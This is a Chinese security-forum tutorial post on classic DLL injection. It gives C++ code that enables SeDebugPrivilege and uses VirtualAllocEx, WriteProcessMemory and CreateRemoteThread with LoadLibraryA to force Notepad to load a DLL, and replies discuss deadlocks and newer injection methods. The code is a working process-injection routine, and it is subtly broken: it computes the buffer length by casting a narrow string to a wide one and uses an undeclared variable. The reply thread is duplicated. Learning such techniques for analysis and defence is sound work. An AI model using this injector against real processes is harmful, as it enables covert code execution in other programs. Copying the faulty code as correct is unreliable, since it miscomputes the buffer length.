[原创]常见进程注入的实现及内存dump分析——经典DLL注入

发表于: 2018-1-14 22:53 13097

[原创]常见进程注入的实现及内存dump分析——经典DLL注入

sudozhange 活跃值

2018-1-14 22:53

13097

前言

前段时间，在论坛看到了这篇文章--> [翻译]十种注入技巧:具有通用性的进程注入技巧研究后，想仔细学习进程注入。平时分析会多些，但很少去实现，如果文章中哪里有错误，欢迎指出，以便及时改正。

环境

OS：Windows 10 PRO 1709

IDE：Visual Studio 2015 Community

语言：Visual C++

Dropper：注射器的实现

原理：简单来说，就是在目标进程中开辟一块堆空间，用于存储DLL的路径，之后使用CreateRemoteThread在目标进程中开启远程线程。

步骤：

获取目标进程PID。

提升Dropper进程权限。

打开目标进程。

在目标进程内开辟缓冲区，用来存储DLL的路径。

找到目标进程中加载的kernel32.dll的句柄，通过该句柄来获取目标进程中kernel32.dll的导出函数LoadLibrary函数的地址。

通过CreateRemoteThread函数来调用LoadLibrary，使目标进程加载Payload DLL。

实现：

获取目标进程PID。（本来想注入计算器，但是获取计算器的进程ID的时候总是获取一个辅助进程ID，所以就注入记事本了）。

HANDLE GetThePidOfTargetProcess()
{
	//Get the pid of the process which to be injected.
	HWND injectionProcessHwnd = FindWindowA(0, "Untitled - Notepad");
	DWORD dwInjectionProcessID;
	GetWindowThreadProcessId(injectionProcessHwnd, &dwInjectionProcessID);
	cout << "Notepad's pid -> " << dwInjectionProcessID << endl;
	HANDLE injectionProcessHandle = ::OpenProcess(PROCESS_ALL_ACCESS | PROCESS_CREATE_THREAD, 0, dwInjectionProcessID);//dwInjectionProcessID);
	return injectionProcessHandle;
}

提升权限。

void PrivilegeEscalation()
{

	HANDLE hToken;
	LUID luid;
	TOKEN_PRIVILEGES tp;
	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
	LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	tp.Privileges[0].Luid = luid;
	AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}

进行注入。

BOOL DoInjection(char *InjectionDllPath,HANDLE injectionProcessHandle)
{
	DWORD injBufSize = lstrlen((LPCWSTR)InjectionDllPath) + 1;
	LPVOID AllocAddr = VirtualAllocEx(injectionProcessHandle, NULL, injBufSize, MEM_COMMIT, PAGE_READWRITE);
	WriteProcessMemory(injectionProcessHandle, AllocAddr, (void*)InjectionDllPath, injBufSize, NULL);
	PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
	HANDLE hRemoteThread;
	if ((hRemoteThread = CreateRemoteThread(injectionProcessHandle, NULL, 0, pfnStartAddr, AllocAddr, 0, NULL)) == NULL)
	{
		ER = GetLastError();
		cout << "Create Remote Thread Failed!" << endl;
		return FALSE;
	}
	else
	{
		cout << "Create Remote Thread Success!" << endl;
		return TRUE;
	}
}

*具体的实现代码在附件中上传也会附上GitHub地址。

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

#病毒木马

上传的附件：

ProcessInjection.7z （4.29MB，214次下载）

收藏・44

免费・2

支持

最新回复 (11)
MaYil 雪币： 7334 活跃值： (4642) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 269 粉丝 2 关注私信	MaYil 2 楼感谢分享 2018-1-15 09:23 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 3 楼 MaYil 感谢分享 2018-1-15 09:42 0
niuzuoquan 雪币： 300 活跃值： (2662) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 520 粉丝 2 关注私信	niuzuoquan 4 楼 mark 2018-1-15 10:06 0
wwhday 雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	wwhday 5 楼强势围观~~ 2018-1-17 14:05 0
黑洛雪币： 6124 活跃值： (4791) 能力值： ( LV6，RANK：80 ) 在线值：发帖 8 回帖 568 粉丝 76 关注私信	黑洛 1 6 楼我记得哪本书上说的来着，请尽量不要在DllMain中进行创建线程的操作，很容易导致死锁。如果你再加个WaitForSingleObject肯定就死锁了。 2018-4-24 07:20 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 7 楼黑洛我记得哪本书上说的来着，请尽量不要在DllMain中进行创建线程的操作，很容易导致死锁。如果你再加个WaitForSingleObject肯定就死锁了。 bingo，确实是这样，所以这种算是最简单的注入技术了 2018-4-24 09:09 0
丘嗒山雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 25 粉丝 0 关注私信	丘嗒山 8 楼怎么样才能不调用CreateRemoteThread？ 2018-8-29 17:34 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 9 楼丘嗒山怎么样才能不调用CreateRemoteThread？用其他的方法注入，这种方法已经很旧很旧了，现在基本上都没有使用的了 2018-8-30 09:27 0
丘嗒山雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 25 粉丝 0 关注私信	丘嗒山 10 楼 sudozhange 用其他的方法注入，这种方法已经很旧很旧了，现在基本上都没有使用的了大佬，求赐教~~，还有你分析x64 内存的截图，用的是啥调试器？ 2018-8-30 10:19 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 11 楼丘嗒山大佬，求赐教~~，还有你分析x64 内存的截图，用的是啥调试器？ x64，我用的是windbg，虽然不太好用吧（不熟练的结果： 2018-8-30 14:04 0
丘嗒山雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 25 粉丝 0 关注私信	丘嗒山 12 楼 sudozhange x64，我用的是windbg，虽然不太好用吧（不熟练的结果：谢谢，我用x64dbg，没问题了！ 2018-8-30 16:34 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

sudozhange

发帖

121

回帖

405

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (11)
MaYil 雪币： 7334 活跃值： (4642) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 269 粉丝 2 关注私信	MaYil 2 楼感谢分享 2018-1-15 09:23 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 3 楼 MaYil 感谢分享 2018-1-15 09:42 0
niuzuoquan 雪币： 300 活跃值： (2662) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 520 粉丝 2 关注私信	niuzuoquan 4 楼 mark 2018-1-15 10:06 0
wwhday 雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	wwhday 5 楼强势围观~~ 2018-1-17 14:05 0
黑洛雪币： 6124 活跃值： (4791) 能力值： ( LV6，RANK：80 ) 在线值：发帖 8 回帖 568 粉丝 76 关注私信	黑洛 1 6 楼我记得哪本书上说的来着，请尽量不要在DllMain中进行创建线程的操作，很容易导致死锁。如果你再加个WaitForSingleObject肯定就死锁了。 2018-4-24 07:20 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 7 楼黑洛我记得哪本书上说的来着，请尽量不要在DllMain中进行创建线程的操作，很容易导致死锁。如果你再加个WaitForSingleObject肯定就死锁了。 bingo，确实是这样，所以这种算是最简单的注入技术了 2018-4-24 09:09 0
丘嗒山雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 25 粉丝 0 关注私信	丘嗒山 8 楼怎么样才能不调用CreateRemoteThread？ 2018-8-29 17:34 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 9 楼丘嗒山怎么样才能不调用CreateRemoteThread？用其他的方法注入，这种方法已经很旧很旧了，现在基本上都没有使用的了 2018-8-30 09:27 0
丘嗒山雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 25 粉丝 0 关注私信	丘嗒山 10 楼 sudozhange 用其他的方法注入，这种方法已经很旧很旧了，现在基本上都没有使用的了大佬，求赐教~~，还有你分析x64 内存的截图，用的是啥调试器？ 2018-8-30 10:19 0
sudozhange 雪币： 285 活跃值： (1105) 能力值： ( LV13，RANK：405 ) 在线值：发帖 28 回帖 121 粉丝 76 关注私信	sudozhange 5 11 楼丘嗒山大佬，求赐教~~，还有你分析x64 内存的截图，用的是啥调试器？ x64，我用的是windbg，虽然不太好用吧（不熟练的结果： 2018-8-30 14:04 0
丘嗒山雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 25 粉丝 0 关注私信	丘嗒山 12 楼 sudozhange x64，我用的是windbg，虽然不太好用吧（不熟练的结果：谢谢，我用x64dbg，没问题了！ 2018-8-30 16:34 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复